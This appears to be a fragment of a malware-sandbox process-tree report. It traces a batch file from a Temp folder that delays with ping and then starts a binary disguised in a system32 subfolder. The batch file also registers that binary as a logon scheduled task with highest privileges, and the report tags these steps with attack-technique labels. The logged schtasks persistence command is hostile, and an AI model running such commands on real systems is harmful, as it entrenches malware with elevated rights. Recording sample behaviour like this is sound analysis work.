C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\17oLu4wEw0RH.bat" "119⤵PID:3600
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1120⤵PID:900
-
-
C:\Windows\system32\chcp.comchcp 65001120⤵PID:4256
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost120⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:4492
-
-
C:\Windows\system32\sru\sru.exe"C:\Windows\system32\sru\sru.exe"120⤵PID:3264
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f121⤵
- Scheduled Task/Job: Scheduled Task
PID:5036 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1122⤵PID:412
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-